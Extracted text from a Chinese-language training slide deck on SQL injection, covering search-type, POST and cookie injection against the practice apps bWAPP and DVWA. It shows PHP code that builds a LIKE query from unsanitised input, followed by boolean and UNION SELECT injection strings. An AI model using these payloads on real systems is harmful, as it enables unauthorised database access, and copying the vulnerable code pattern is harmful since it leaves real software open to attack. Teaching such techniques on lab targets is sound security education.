整数型+搜索性+post.ppt

整数型注入+post+搜索性注入 主要内容 搜索型如何注入 Post如何注入 cookie注入 搜索型注入----以bwapp为例 搜索型注入----以bwapp为例 ?php if(isset($_GET[title])) { $title = $_GET[title]; $sql = SELECT * FROM movies WHERE title LIKE %$title%; $recordset = mysql_query($sql, $link); if(!$recordset) { // die(Error: . mysql_error()); } .......//打印SQL执行结果 } ? 搜索型注入 搜索时后端数据库语句： select * from movies where title like %$title%; select * from movies where title like %a%; select * from movies where title like %a% and 1=1 and %=%; select * from movies where title like %a% and 1=2 and %=%; select * from movies where title like %a% union selecct 1,2,3,4,5,7 and %=%; post注入-------以bwapp为例 post注入 ----以bwapp为例 cookie注入--以DVWA为例